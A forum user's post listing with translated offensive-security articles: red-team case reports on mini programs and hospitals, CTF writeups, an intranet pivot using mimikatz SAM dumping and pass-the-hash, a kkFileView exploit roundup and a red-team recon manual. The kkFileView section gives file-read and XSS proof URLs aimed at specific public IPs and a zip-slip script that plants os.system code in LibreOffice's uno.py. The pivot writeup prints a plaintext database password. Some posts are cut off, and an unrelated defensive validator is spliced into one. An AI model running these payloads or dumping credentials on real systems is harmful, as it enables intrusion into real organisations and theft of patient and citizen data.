Everything posted by UKhackteam
-
Title: Summary of sharing cases for mini program management
0x00 Introduction

I have just finished an HVV exercise in a certain region. Mini programs, being low-cost and easy-to-build information systems, have become a key new breakthrough target in HVV. All of the following cases come from mini programs and are shared for everyone to learn from.

0x01 Case 1: a government affairs system

1. Weak password into the admin background

Open the mini program, enter the citizen services section, capture the mini program's domain name from the traffic, and the administrator background is directly reachable. The page below is the Fastadmin framework. There was one pitfall here: on login the system kept reporting that the password was invalid. Just as I was about to give up, clicking back to the previous step showed a reminder that I was already logged in. Puzzled, I found that the token is refreshed after a login, so the next login attempt reuses the previous token and is rejected as "password invalid". Presumably a delay in the network or in the system itself meant the login request was not submitted with the current token. By the time I noticed this I was already logged into the background with admin/123456. It holds nearly 20,000 citizen records as well as hundreds of administrator accounts, and every administrator account uses admin/123456. This is similar to the case 4 system in "Prefecture-level city HVV | unauthorized access collection". (Damn it.)

2. SQL injection everywhere

The front-end business handling page sends the following request. Debug mode was not turned off, so the database account name and password were exposed. The SQL injection here is too obvious, but at that moment I was busy rejoicing over the database credentials and did not test the injection. Unfortunately the database is not exposed externally and only accepts local connections, which was very annoying. A time-based injection also exists when viewing administrators in the background.

3. Command execution to take over the server and database

Since this is Fastadmin, there are many ways to get a shell.
This time I used the vulnerability in the online command plug-in to write a PHP webshell; that plug-in only ships with version 1.1.0. However, this system is a secondary development (customised build) and there is no plug-in section anywhere. I searched online for the plug-in page path. The directory is /addon?ref=addtabs, and the command plug-in directory should be /addon/command?ref=addtabs, but that page does not exist. I assumed the route had not been configured and set this aside, until a teammate found in an article that the command plug-in can be reached directly, i.e. the directory is /command?ref=addtabs.

Click "generate API document" with one click: the output file is PHP, and the title field is written as the webshell payload. Only a Behinder ("Ice Scorpion") webshell was able to connect; there have been similar cases before. The webshell connects successfully.

Using the nc built into the big webshell, I bounced a shell to a cloud server and escalated to root privileges. The big webshell throws errors and garbled output when executing SQL statements. I still remembered the database account and password, so I connected to the database by writing my own PHP page that executes SQL statements, to prove that I had obtained database privileges.
The code is as follows:

```php
<html>
<head>
  <title>Execute MySQL statement</title>
</head>
<body>
<h1>Execute MySQL statement</h1>
<form method="POST" action="">
  <textarea name="sql_statement" rows="5" cols="50" placeholder="Please enter a MySQL statement"></textarea>
  <br>
  <input type="submit" value="Execute">
</form>
<?php
// Check whether the form has been submitted
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    // Get the MySQL statement entered by the user
    $sql_statement = $_POST['sql_statement'];

    // Connect to the MySQL database
    $host = 'localhost';
    $username = '';
    $password = '';
    $database = '';
    $connection = mysqli_connect($host, $username, $password, $database);
    if (!$connection) {
        die('<p>Connection failed: ' . mysqli_connect_error() . '</p>');
    }

    // Execute the MySQL query
    $result = mysqli_query($connection, $sql_statement);

    // Check the query result
    if ($result) {
        // Echo the query result
        echo '<h2>Query result:</h2>';
        while ($row = mysqli_fetch_assoc($result)) {
            echo '';
            print_r($row);
            echo '';
        }
    } else {
        // Display the error message
        echo '<h2>Error:</h2>';
        echo '<p>' . mysqli_error($connection) . '</p>';
    }

    // Close the database connection
    mysqli_close($connection);
}
?>
</body>
</html>
```

0x02 Case 2: a county hospital database

1. SQL injection giving DBA

The hospital's SQL injection is in the official account's appointment registration. After logging in I clicked the appointment records and captured a request carrying the patient ID. Adding a single quote produced an error, and order by confirmed that the injection exists even though sqlmap could not run it directly. The ASP.NET framework indicated that the target system is Windows. I specified MySQL, Oracle and MSSQL in turn as the database; the injection finally ran through with MSSQL, and the privileges are DBA. I thought xp_cmdshell could execute commands, but unfortunately this is a HIS (hospital information system) with protection in place, and no matter how I configured it I could not execute commands, so I gave up and changed target.

0x03 Case 3: a middle school visitor system

1. Unauthorized access + information leakage

Opening the mini program and capturing the traffic directly reveals all the information of the people being visited.
One interface can be accessed without authorization. It looked like this before logging in, so I logged in to take a closer look. After logging in I submitted a visit application, then captured the request when viewing my own visit application record. The link captured is app/visitor/getVisitorInfo?viId=1. By iterating over viId, hundreds of visitors' information and visit records can be obtained. At first I took this for horizontal privilege escalation (IDOR), but in the end it turned out to be plain unauthorized access with no permission check at all.

0x04 Case 4: the one I missed

This case is rather funny. I was searching for a mini program, typed one character without looking carefully, and a mini program popped up. It is also a county hospital, and this mini program was probably built specifically for nucleic acid test appointments during the epidemic.

1. Horizontal privilege escalation (IDOR) + information leakage

If the ID card number and name do not match at login, verification fails, which means all the ID card information inside is real. After logging in I habitually looked for functions carrying a user ID, clicked the patient visit list and captured the request. It returned my phone number, ID number, name and gender. Modifying the id shows other people's information, more than 100,000 records in total, which is definitely IDOR.

2. IDOR + SQL injection

Habitually adding a single quote immediately produced an error, and the page displayed an SQL error. Isn't this exactly the pattern from the summary at the end of the "edu SQL injection case sharing": where there is IDOR there is a high probability of SQL injection too? But I was in the wrong here, since I did not have authorization for this target, so I stopped and handed it over to the platform for rectification.

Original link: https://forum.butian.net/share/2400
-
Title: Anxun Cup SYCCTF2023 writeup
1. MISC

1. sudoku_easy

A simple Sudoku interaction. A few small points to watch: the server sleeps 5 seconds after each level is selected, and the puzzle is only returned after the sleep. The puzzle looks like this:

---------------------
800103720
023840650
410006008
300001062
000052407
072060090
160000375
205019846
000030000
---------------------

Convert it to a two-dimensional array, solve the Sudoku, and convert the result back to a multi-line string:

```python
def parse_input(input_list):
    board = []
    for row in input_list:
        nums = list(map(int, row))
        board.append(nums)
    return board


def format_output(board):
    formatted = ''
    for row in board:
        formatted += ''.join(map(str, row)) + '\n'
    return formatted.strip()
```

At first I thought each level gave 5 points and 120 points were needed, so I set the loop range to 24, but I kept running into problems. Later I found that the score increments grow, and while debugging I saw that reaching 120 points returns a shell, so I changed the range to 7.
Final script:

```python
import time
from pwn import *


def find_empty(board):
    for row in range(9):
        for col in range(9):
            if board[row][col] == 0:
                return row, col
    return None


def is_valid(board, num, pos):
    row, col = pos
    for i in range(9):
        if board[row][i] == num and col != i:
            return False
        if board[i][col] == num and row != i:
            return False
    box_row = row // 3
    box_col = col // 3
    for i in range(box_row * 3, box_row * 3 + 3):
        for j in range(box_col * 3, box_col * 3 + 3):
            if board[i][j] == num and (i, j) != pos:
                return False
    return True


def solve(board):
    find = find_empty(board)
    if not find:
        return True
    row, col = find
    for i in range(1, 10):
        if is_valid(board, i, (row, col)):
            board[row][col] = i
            if solve(board):
                return True
            board[row][col] = 0
    return False


def parse_input(input_list):
    board = []
    for row in input_list:
        nums = list(map(int, row))
        board.append(nums)
    return board


def format_output(board):
    formatted = ''
    for row in board:
        formatted += ''.join(map(str, row)) + '\n'
    return formatted.strip()


# input_string = '''---------------------
# 800103720
# 023840650
# 410006008
# 300001062
# 000052407
# 072060090
# 160000375
# 205019846
# 000030000
# ----------------------
# now give me you solve:'''
# lists = input_string.split('\n')[1:10]
# board = parse_input(lists)
# print(board)
# solve(board)
# print(board)

# Create a connection
conn = remote('47.108.165.60', 27539)

# Seven rounds: reaching 120 points returns the shell
for i in range(7):
    # Receive welcome message
    msg = conn.recvuntil('Please input:').strip().decode('utf-8')
    print(msg)
    # Send selection
    conn.sendline('1'.encode())
    # Receive next prompts
    msg = conn.recvuntil('Please select the level:').strip().decode('utf-8')
    print(msg)
    conn.sendline('5'.encode())
    msg = conn.recvuntil('clock start').strip().decode('utf-8')
    print(msg)
    time.sleep(5)
    msg = conn.recvuntil('now give me you solve:').strip().decode('utf-8')
    print(msg)
    lists = msg.split('\n')[1:10]
    board = parse_input(lists)
    solve(board)
    solved = format_output(board)
    conn.sendline(solved.encode())

conn.interactive()
```

An alternative version of the script:

```python
from pwn import *


def is_valid(board, row, col, num):
    # Check whether the row is legal
    for i in range(9):
        if board[row][i] == num:
            return False
    # Check whether the column is legal
    for i in range(9):
        if board[i][col] == num:
            return False
    # Check whether the 3*3 box is legal
    start_row = (row // 3) * 3
    start_col = (col // 3) * 3
    for i in range(3):
        for j in range(3):
            if board[start_row + i][start_col + j] == num:
                return False
    return True


def solve_sudoku(board):
    for row in range(9):
        for col in range(9):
            if board[row][col] == 0:
                for num in range(1, 10):
                    if is_valid(board, row, col, num):
                        board[row][col] = num
                        if solve_sudoku(board):
                            return True
                        board[row][col] = 0  # Backtrack
                return False  # Every number tried, none fits
    return True


def print_sudoku(board):
    a = ''
    for row in range(9):
        for col in range(9):
            a += str(board[row][col])
        a += '\n'
    return a.strip()


context.log_level = 'debug'
p = remote('47.108.165.60', 23479)
p.recv()
for i in range(7):
    p.sendline('1')
    p.recvuntil('Please select the level:')
    p.sendline('5')
    a = '---------------------\nnow give me you solve:'
    content = p.recvuntil(a).decode().split(a)[0][-130:]
    sudoku = content.split('---------------------')[1]
    sudoku = sudoku.strip()
    sudoku = sudoku.split('\n')
    tmp = []
    for sudo in sudoku:
        a = [int(s) for s in sudo]
        tmp.append(a)
    if solve_sudoku(tmp):
        result = print_sudoku(tmp)
        log.info(result)
        for line in result.split('\n'):
            p.send(line)
    # content = p.recv().decode()
p.interactive()
```

A separate Sudoku solving script:

```python
class SudoKu():
    def __init__(self, sudo_ku_data):
        if not isinstance(sudo_ku_data, list):
            raise TypeError(f'sudo_ku_data params must a list, but {sudo_ku_data} is a {type(sudo_ku_data)}')
        if len(sudo_ku_data) != 9 or len(sudo_ku_data[0]) != 9:
            raise TypeError(
                f'sudo_ku_data params must a 9*9 list, but {sudo_ku_data} is a {len(sudo_ku_data)}*{len(sudo_ku_data[0])} list')
        self.sudo_ku = sudo_ku_data
        # Numbers already present in each row
        self.every_row_data = {}
        # Numbers already present in each column
        self.every_column_data = {}
        # Numbers already present in each 3*3 box
        self.every_three_to_three_data = {}
        # Each vacant position
        self.vacant_position = []
        # Numbers tried at each vacant position
        self.every_vacant_position_tried_values = {}
        # Initialize data
        self._init()

    def _add_row_data(self, row, value):
        '''
        At initialization, add data to self.every_row_data
        :param row:
        :param value:
        :return:
        '''
        if row not in self.every_row_data:
            self.every_row_data[row] = set()
        if value in self.every_row_data[row]:
            raise TypeError(f'params {self.sudo_ku} is a invalid SudoKu')
        self.every_row_data[row].add(value)

    def _add_column_data(self, column, value):
        '''
        At initialization, add data to self.every_column_data
        :param column:
        :param value:
        :return:
        '''
        if column not in self.every_column_data:
            self.every_column_data[column] = set()
        if value in self.every_column_data[column]:
            raise TypeError(f'params {self.sudo_ku} is a invalid SudoKu')
        self.every_column_data[column].add(value)

    def _get_three_to_three_key(self, row, column):
        '''
        Get the key of the 3*3 box a cell belongs to
        :param row:
        :param column:
        :return:
        '''
        if row in [0, 1, 2]:
            if column in [0, 1, 2]:
                key = 1
            elif column in [3, 4, 5]:
                key = 2
            else:
                key = 3
        elif row in [3, 4, 5]:
            if column in [0, 1, 2]:
                key = 4
            elif column in [3, 4, 5]:
                key = 5
            else:
                key = 6
        else:
            if column in [0, 1, 2]:
                key = 7
            elif column in [3, 4, 5]:
                key = 8
            else:
                key = 9
        return key

    def _add_three_to_three_data(self, row, column, value):
        '''
        At initialization, add data to self.every_three_to_three_data
        :param row:
        :param column:
        :param value:
        :return:
        '''
        key = self._get_three_to_three_key(row, column)
        if key not in self.every_three_to_three_data:
            self.every_three_to_three_data[key] = set()
        self.every_three_to_three_data[key].add(value)

    def _init(self):
        '''
        Initialize data from the Sudoku passed in
        :return:
        '''
        for row, row_datas in enumerate(self.sudo_ku):
            for column, value in enumerate(row_datas):
                if value == '':
                    self.vacant_position.append((row, column))
                else:
                    self._add_row_data(row, value)
                    self._add_column_data(column, value)
                    self._add_three_to_three_data(row, column, value)

    def _judge_value_is_legal(self, row, column, value):
        '''
        Determine whether placing the value at this position is legal
        :param row:
        :param column:
        :param value:
        :return:
        '''
        # Does the value already exist in this row
        if value in self.every_row_data[row]:
            return False
        # Does the value already exist in this column
        if value in self.every_column_data[column]:
            return False
        # Does the value already exist in this 3*3 box
        key = self._get_three_to_three_key(row, column)
        if value in self.every_three_to_three_data[key]:
            return False
        return True

    def _calculate(self, vacant_position):
        '''
        Calculate: start placing values on the Sudoku
        :param vacant_position:
        :return:
        '''
        # Get the current position
        row, column = vacant_position
        values = set(range(1, 10))
        # Build a unique key for the current position to store the values already tried here
        key = str(row) + str(column)
        # If the key exists, take the set difference; both are sets, so '-' works directly
        if key in self.every_vacant_position_tried_values:
            values = values - self.every_vacant_position_tried_values[key]
        # If the key does not exist, create an empty set
        else:
            self.every_vacant_position_tried_values[key] = set()
        for value in values:
            # Record the current value among those tried at this position
            self.every_vacant_position_tried_values[key].add(value)
            # If the current value is legal, it can be placed
            if self._judge_value_is_legal(row, column, value):
                # print(f'set {vacant_position} value is {value}')
```
-
Title: 2023 Spring and Autumn Cup Cyber Security League Spring Tournament writup
Re: Emoji Connect

Emoji Connect is an Excel plug-in. After the game starts, a 48*48 matrix is initialised with one emoji in each cell, and each move clicks two cells; if the emoji in the two cells is the same, both are eliminated. At first I thought it was a match-three elimination game like the "stars" game, but the game logic only replaces two cells per move, so I read through the logic step by step. The flag logic subtracts the cells' row values every time a pair is eliminated. The index is derived from the Unicode code point by a rather magical method; I simply used the minimum emoji value in the matrix as the index offset.

dat = '''
-
Title: Remember the horizontal case from JS to the intranet once
Foreword

Some time ago I took part in an offensive and defensive drill. After the conventional vulnerabilities were exhausted, I remembered that many experts had shared articles on finding breakthroughs in JS, so I started from JS and eventually opened an entry into the intranet, obtaining target privileges and personal information. The process is shared here.

Statement: in this drill all test equipment was provided by the organiser, all traffic was archived for audit, all operations were completed under authorisation, and all data was securely destroyed after the end.

Breaking in through JS

At the beginning there was only a login page; the username could not be enumerated and brute-force attempts failed. Capturing traffic with Burp to inspect the JS files revealed SQL statements. Tracing the comboxSQL variable showed that an action class is defined. Searching for this action class path revealed that it is accessed by concatenating the path in the URL. The path is spliced together and the parameters are inserted into the SQL statement. Testing showed that the database is MSSQL, and system commands could be executed through xp_cmdshell.

shellcodeloader brings CS online

After obtaining SYSTEM privileges I planned to bring up Cobalt Strike (CS) via a remote download without bothering with AV evasion, but it did not come online. I found that 360 Enterprise Cloud was present and had intercepted execution of the exe. Changing approach: after uploading the Godzilla webshell, I used Godzilla's shellcodeloader function to load my own CS shellcode and came online successfully.

Decrypting the database configuration

Because executing exe files was denied and nothing could be run, I searched the local configuration files and found the database account and password, but the database password was encrypted.

Searching historical website backup files turned up an early configuration of the system in which database password encryption had not yet been configured, and a test showed that it could be used to connect to the database. While looking through this system's database backup files I accidentally discovered another business system deployed on the server; the account, password and database IP in its configuration file were also stored encrypted. From the system's characteristics it was identified as a SiteServer CMS. Searching online I found SiteServer CLI, a dedicated encryption and decryption tool for this CMS. After running it, the plaintext database configuration could also be obtained:

Server=x.x.x.x;Uid=sa;Pwd=xxCSthink!@#123;Database=NEWdfgxxcs

Connecting through the proxy, the test connection succeeded. However, the database server also could not execute exe programs: mimikatz could not be run to read the administrator hash, no user could be created, and tscan could not be uploaded for intranet scanning, so I was stuck here for a while. Finally, I used the information-gathering features of the CS plug-in to detect assets on the intranet segment. An attack with the 17010 (MS17-010) plug-in failed. Using proxychains together with msf I obtained privileges on a PC. After reading the administrator password with mimikatz and enabling remote desktop, I found that I still could not log in. Loading the mimikatz module in msf:

privilege::debug
ts::multirdp

Obtaining intranet privileges

Create a new user and enter the personal PC. Using this PC as a base, upload TideFinger and Tscan to scan the intranet. These two tools deserve an introduction.

Functions of the Go version of TideFinger (fingerprint recognition):
1. Added Dismap, Vscan, Kscan, fofa, ServerScan and other fingerprints.
2. Added ServerScan's non-web service fingerprints and optimised the coroutine concurrency of asset discovery.
3. The display borrows from Dismap; it should currently be among the best in efficiency and fingerprint coverage.

Functions of the Go version of Tscan:
1. Tscan is an internal and external network asset scanning tool jointly maintained by the Tide security team.
2. The base code is iterated along with Fscan updates.
3. It is linked with the Chaosheng POC vulnerability detection platform: team members write POCs for recently disclosed vulnerabilities every month, regularly collect and organise POCs published on the Internet, and then release updates.

After scanning the intranet segment, the next step is vulnerability verification. At a glance there were no holes that could get a shell directly, but the fingerprinting found one intranet IP with port 2222 open as RMI. Although privileges on the server had been obtained, no other relevant account or password information was found when collecting information on it.

Getting user hashes from the SAM file

Using the sekurlsa::logonpasswords command in mimikatz, I tried to read the lsass process to obtain the password of the currently logged-in user. The output showed no administrator user information (mainly because, when using the CS permission earlier, the AV strategy was probably triggered and the server restarted). Then query user showed that the administrator user was not online, so the administrator hash could not be read directly from memory. Instead, read the hashes from the SAM file with mimikatz:

# Elevate privileges
privilege::debug
# Elevate to SYSTEM
token::elevate
# Dump the SAM
lsadump::sam

Pass-the-hash

After obtaining the NTLM hash, I found that the plaintext password could not be recovered directly from online cracking sites. Passing the obtained NTLM hash gave privileges on four servers. Next, log in to the servers with the hash and continue collecting information.

A nested remote desktop session to a Windows Server 2003 system was found on one of the servers.

Obtaining the server password

Read this password with mimikatz (before KB2871997, mimikatz could grab the plaintext password directly):

* Username : Administrator
* Domain   : WIN-LAOLOVGMF
* Password :
-
Title: kkFileView Vulnerability Summary
0x00 kkFileView arbitrary file read vulnerability

Vulnerability description: Keking kkFileView is a Spring Boot online document preview project developed in China. kkFileView has a security vulnerability that stems from a directory traversal flaw allowing arbitrary files to be read, which may leak sensitive files on the host.

Affected versions: kkFileView = 3.6.0

fofa query: body='kkFile:View'

Proof of vulnerability:
http://103.39.221.102:8012//getCorsFile?urlPath=file:///etc/passwd

0x01 kkFileView SSRF vulnerability

Vulnerability description: kkFileView v4.1.0 has an SSRF vulnerability. Attackers can exploit it to cause server-side request forgery (SSRF): a remote attacker can force the application to issue arbitrary requests by injecting any URL into the URL parameter.

Affected versions: kkFileView = v4.1.0

Proof of vulnerability:
http://121.40.238.48:8012//getCorsFile?urlPath=aHR0cDovL2QyYjY0NWQ3LmRucy5kbnNtYXAub3Jn

0x03 kkFileView XSS vulnerability

Vulnerability description: kkFileView v4.1.0 has two XSS vulnerabilities, which may lead to leakage of website cookies.

Affected versions: kkFileView = v4.1.0

Proof of vulnerability:

Payload: http://www.baidu.com/test.txt"><img src=111 onerror=alert(1)>
base64 encoded: aHR0cDovL3d3dy5iYWlkdS5jb20vdGVzdC50eHQiPjxpbWcgc3JjPTExMSBvbmVycm9yPWFsZXJ0KDEpPg==
URL encoded: aHR0cDovL3d3dy5iYWlkdS5jb20vdGVzdC50eHQiPjxpbWcgc3JjPTExMSBvbmVycm9yPWFsZXJ0KDEpPg%3D%3D

poc1:
/onlinePreview?url=%3Cimg%20src=x%20onerror=alert(0)%3E
/picturesPreview?urls=aHR0cDovL3d3dy5iYWlkdS5jb20vdGVzdC50eHQiPjxpbWcgc3JjPTExMSBvbmVycm9yPWFsZXJ0KDEpPg%3D%3D
http://139.9.164.127:8012/onlinePreview?url=%3Cimg%20src=x%20onerror=alert(0)%3E
http://119.91.146.127:8012/picturesPreview?urls=aHR0cDovL3d3dy5iYWlkdS5jb20vdGVzdC50eHQiPjxpbWcgc3JjPTExMSBvbmVycm9yPWFsZXJ0KDEpPg%3D%3D

Payload: <svg/onload=alert(1)>
base64 encoded: PHN2Zy9vbmxvYWQ9YWxlcnQoMSk+
URL encoded: PHN2Zy9vbmxvYWQ9YWxlcnQoMSk%2B

poc2:
/picturesPreview?urls=currentUrl=PHN2Zy9vbmxvYWQ9YWxlcnQoMSk%2B
http://119.91.146.127:8012/picturesPreview?urls=currentUrl=PHN2Zy9vbmxvYWQ9YWxlcnQoMSk%2B

0x04 kkFileView arbitrary file upload leading to XSS and file inclusion

Vulnerability description: all versions of kkFileView have a file parsing vulnerability. Attackers can use it to create stored XSS, file inclusion or SSRF: a remote attacker can persistently make the application issue attack requests by uploading an arbitrary JavaScript file to the server.

Affected versions: kkFileView = 4.1.0

Proof of vulnerability:
1. Upload a file.
2. Access the vulnerable location: http://139.9.101.60:8012/demo/2.html
3. File inclusion: https://file.keking.cn/demo/test1.js, then access https://file.keking.cn/demo/test14.html

0x05 kkFileView arbitrary file deletion vulnerability

Vulnerability description: kkFileView v4.0.0 has an arbitrary file deletion vulnerability, which may allow any file on the system to be deleted.

Affected versions: kkFileView = v4.0.0

Proof of vulnerability:
/deleteFile?fileName=demo%2F.\xss.pdf

A GET request to this URI deletes xss.pdf in the \kkFileView-master\server\src\main\file directory (the intended location is the \kkFileView-master\server\src\main\file\demo directory).

0x06 kkFileView v4.3.0~v4.40-beta RCE vulnerability

Affected versions: v4.2.1 and v4.2.0 are also affected; 4.1.0 is not affected.

Arbitrary file upload:

```python
import zipfile

if __name__ == '__main__':
    try:
        binary1 = b'1ueeeeeee'
        binary2 = b'hacked_by_1ue'
        zipFile = zipfile.ZipFile('hack.zip', 'a', zipfile.ZIP_DEFLATED)
        info = zipfile.ZipInfo('hack.zip')
        zipFile.writestr('test', binary1)
        zipFile.writestr('././././././././././././././././././././././././tmp/flag', binary2)
        zipFile.close()
    except IOError as e:
        raise e
```

Build the malicious hack.zip; note that it must contain a normal file such as test, so that the hack.zip_cache file gets created. Upload the file and preview it. The traversal succeeds: any file can be uploaded, and file contents can be appended.

After further research I found that the target invokes the system's LibreOffice when converting odt to pdf, and that process loads the uno.py file from its library, so the contents of that py file can be overwritten.

```python
import zipfile

if __name__ == '__main__':
    try:
        binary1 = b'1ue'
        binary2 = b'import os\r\nos.system(\'touch /tmp/hack_by_1ue\')'
        zipFile = zipfile.ZipFile('hack.zip', 'a', zipfile.ZIP_DEFLATED)
        info = zipfile.ZipInfo('hack.zip')
        zipFile.writestr('test', binary1)
        zipFile.writestr('././././././././././././././././././././././././opt/libreoffice7.5/program/uno.py', binary2)
        zipFile.close()
    except IOError as e:
        raise e
```

Upload the malicious zip package and preview it. Then upload an odt file and preview it to trigger a LibreOffice task. The command can be seen to have executed successfully, and the content is indeed written into uno.py.
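As an added example (not kkFileView's own code), the checks a preview endpoint should apply to its caller-supplied URL before fetching it, covering the three input-handling cases above: the file:// read, SSRF to a non-public address, and markup smuggled through the url/urls parameters. All function names, the allowlist parameter and the sample values are my own assumptions; a hostname that points at an internal address is only caught by the allowlist or by resolving it first, as the comment notes.

```python
from __future__ import annotations

import base64
import binascii
import ipaddress
import re
from urllib.parse import urlsplit

# Hypothetical names, not kkFileView's own. Only remote documents over HTTP(S)
# are legitimate preview sources; file:, jar:, ftp: and the like are rejected.
ALLOWED_SCHEMES = frozenset({"http", "https"})
# Characters that never occur in a legitimate document URL but do in markup
# smuggled through url= / urls= (quotes, angle brackets, whitespace).
MARKUP_CHARS = re.compile(r'[<>"\'\s]')


def encode_param(url: str) -> str:
    """Encode a URL the way the base64 form of the parameter is built."""
    return base64.b64encode(url.encode("utf-8")).decode("ascii")


def decode_param(value: str) -> str:
    """Return the plain URL: the parameter may be a literal URL or base64."""
    padded = value + "=" * (-len(value) % 4)
    try:
        return base64.b64decode(padded, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError, ValueError):
        return value  # not valid base64, so treat it as the literal URL


def check_preview_url(param: str, allowed_hosts: frozenset[str] | None = None) -> tuple[bool, str]:
    """Validate a preview URL parameter.

    Returns (True, url) when the URL may be fetched, otherwise (False, reason).
    allowed_hosts, when given, restricts fetches to the organisation's own
    document stores, which is the strongest SSRF control of the three.
    """
    url = decode_param(param)
    if MARKUP_CHARS.search(url):
        return False, "markup or whitespace in URL"
    parts = urlsplit(url)
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return False, f"scheme {parts.scheme or '(none)'!r} not allowed"
    host = parts.hostname
    if not host:
        return False, "missing host"
    if allowed_hosts is not None and host.lower() not in allowed_hosts:
        return False, f"host {host!r} not in allowlist"
    try:
        addr = ipaddress.ip_address(host)
    except ValueError:
        # A hostname: production code must resolve it and re-check the
        # resolved address as well, otherwise DNS can point it back inside.
        addr = None
    if addr is not None and not addr.is_global:
        return False, f"non-public address {host}"
    return True, url


# Constructed sample parameters modelled on the cases above (not real targets).
SAMPLES = {
    "file_read": "file:///etc/passwd",
    "loopback_ssrf": "http://127.0.0.1:8012/admin",
    "private_ssrf_b64": encode_param("http://10.0.0.5/status"),
    "markup_b64": encode_param('http://example.com/a.txt"><b>x</b>'),
    "document": "http://example.com/report.pdf",
    "document_b64": encode_param("http://example.com/report.pdf"),
}


def run_samples() -> dict[str, bool]:
    """Verdict per sample: only the two genuine document URLs should pass."""
    return {name: check_preview_url(value)[0] for name, value in SAMPLES.items()}


if __name__ == "__main__":
    for name, verdict in run_samples().items():
        reason = check_preview_url(SAMPLES[name])[1]
        print(f"{name:18} {'ALLOW' if verdict else 'REJECT'}  {reason}")
```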
-
Title: Red side personnel practical manual
Brief description of daily procedures Entry permission=Intranet collection/detection=Exemption of killing [not required]=Crawl login credentials=Cross-platform horizontal=Entry maintenance=Data return=Regular permission maintenance 0x01 Access to the entry permission [In the early reconnaissance, there are not many defensible points in the collection stage, and they are not the center of defense] 1. Find all the real IP segments around the CDN (1). Through multiple PINGs across the country, check whether the IP address is unique to determine whether CDNhttp://ping.chinaz.com/https://tools.ipip.net/ping.phphttps://www.17ce.com/https://www.cdnplanet.com/tools/cdnfinder/(2). Through the previous DNS binding history Record to find the real IP address https://x.threatbook.cn/https://viewdns.info/https://www.ip138.com/http://toolbar.netcraft.com/site_report?url=https://securitytrails.com/(3). By obtaining multiple subdomains and pinging multiple subdomains in batches, you can determine the IP of the subdomain The segment is the real IP segment (the main site uses CND, while the subdomain sub-site does not use Cdn to resolve) Layer subdomain excavator/GoogleHackinghttps://phpinfo.me/domain/http://tool.chinaz.com/subdomain/https://github.com/lijiejie/subDomainsBrute(4). Use SSL certificate to find the real original IPhttps://c ensys.io/https://crt.sh/(5). Use foreign host to resolve domain name https://asm.ca.com/zh_cn/ping.phphttps://asm.saas.broadcom.com/zh_cn/register.phphttps://dnscheck.pingdom.com(6). Website vulnerability search such as phpinfo or github sensitive information leakage or Apache status and Jboss status sensitive information leakage, web source code leakage, svn information leakage letter, github information leakage (7). Website email subscriptions look for RSS email subscriptions. Many websites come with sendmail and will send us an email. At this time, checking the email source code will contain the server's real IP. (8). 
Invade CDN and enter through loopholes or weak social workers' passwords. (9). Obtain the real IP through ZMAP and Zgrab's full network scanning: https://www.ip2location.com/free/visitor-blockerhttps://www.ipdeny.com/ipblocks/https://www.t00ls.net/articles-40631.html(Zgrab)https://levyhsu.com/2017/05/%e5%88%a9%e7% 94%a8zgrab%e7%bb%95cdn%e6%89%be%e7%9c%9f%e5%ae%9eip/http://bobao.360.cn/learning/detail/211.html(ZMAP)(10).Cyberspace security engine search Zhong Kui's Eye: https://www.zoomeye.orgShodan: https://www.shodan.ioFofa: https://fofa.s(11).Fantasy ping such as ping www.163.com. If ping 163.con, it can bypass (12). The old domain name of the previous one can be pinged (13). F5 LTM decoding method When the server uses F5 LTM for load balancing, the real IP can also be obtained by decoding the set-cookie keyword, for example: Set-Cookie: BIGipServerpool_8.29_8030=487098378.24095.0000. First take out the decimal number of the first section, namely 487098378, then convert it into hexadecimal number 1d08880a, then from the back to the front, take the four-digit number, that is, 0a.88.08.1d, and finally convert them into decimal number 10.136.8.29 in turn, which is the last real ip2. Various web management backend login ports for finding the target (1) Bulk crawl all real C segments of the target Web banner tool: iisput (2). Batch basic service port scanning, detection and identification tools for all real C segments of the target: Yujian Port Scan, Goby (3). Try whether the target DNS allows the area transmission. If it is not allowed, continue to try to blast the subdomain DNS domain transmission: C:\Users\ljnslookup default server : UnKnownAddress: 211.82.100.1 server dns1.thnu.edu.cn default server : dns1.thnu.edu.cnAddress: 125.223.168.5 ls thnu.edu.cn subdomain name explosion: Layer(4). 
(4). Bulk crawl the Web banners of all target subdomains. Tool: Layer
(5). Batch detect and identify the basic service ports of all subdomains of the target. Tools: Yujian Port Scan, Goby
(6). Batch identify the web program fingerprint and detailed version of all surviving Web sites
https://github.com/EdgeSecurityTeam/EHole
https://github.com/zhzyker/vulmap
http://finger.tidesec.com/
http://whatweb.bugscaner.com/look/
https://fp.shuziguanxing.com/#/
https://www.yunsee.cn/
(6). Find sensitive files and account passwords leaked by the target on Git; occasionally you even come across cloud 'AccessKey' values the target leaked by accident
https://github.com/0xbug/Hawkeye
https://github.com/FeeiCN/GSIL
(6). Find sensitive files and account passwords leaked by the target on network disks / Baidu Library
http://www.daysou.com/ (network disk search)
(7). Find sensitive account passwords the target has leaked, from third-party historical vulnerability databases [very useful for domestic targets]
https://www.madebug.net/
(8). Sensitive files leaked by the target through Svn. Tool: Seay SVN vulnerability exploit tool
(9). Website directory scan [find the sensitive files leaked by the target website: website backups, sensitive configuration files, source code, other people's webshells, etc.]
Tools: Yujian Directory, dirsearch
https://github.com/foryujian/yjdirscan
https://github.com/maurosoria/dirsearch
(10). Sensitive information leaked by the target site itself in its front-end code
(11). In-depth use of fofa/shodan/bing/google hacking
(12). Collect target student numbers / employee work numbers / target email addresses [and batch-check in social engineering databases whether these email addresses have leaked passwords]. Student numbers: collect from the official website and Tieba forums; employee numbers: search the official website, social engineering databases and GitHub
(13). Technical documents / wikis provided by the target, and the account passwords and other sensitive information in them
(14). The target's WeChat mini program and official account
(15). Analyze the Web requests of the target's app
(16). Use a js probe to collect target intranet information
(17). Find ways to get into the target's internal QQ groups / WeChat groups
(18). Analyze the target's direct suppliers [especially technology outsourcing]
(19). Build a targeted weak password dictionary from all the information collected earlier
https://xsshs.cn/xss.php?do=pass
(20). Identify the WAF type used by the target, and bypass it
https://github.com/EnableSecurity/wafw00f (WAF identification)
(21). BypassWAF file upload / read / download
(22). BypassWAF SQL injection
(23). BypassWAF RCE
(24). BypassWAF known Nday vulnerabilities in various Java Web middleware
(25). BypassWAF Webshell AV evasion
More to come; please add and correct.
0x02 Access to the entry permission [external defense focus ("top priority")]
This stage mainly targets the various known Nday vulnerabilities of mainstream 'middleware + open source programs + web service components'. The following has been sorted in detail using the 'difficulty of actual attack exploitation' and 'how high the shell permissions obtained are' as the criteria.
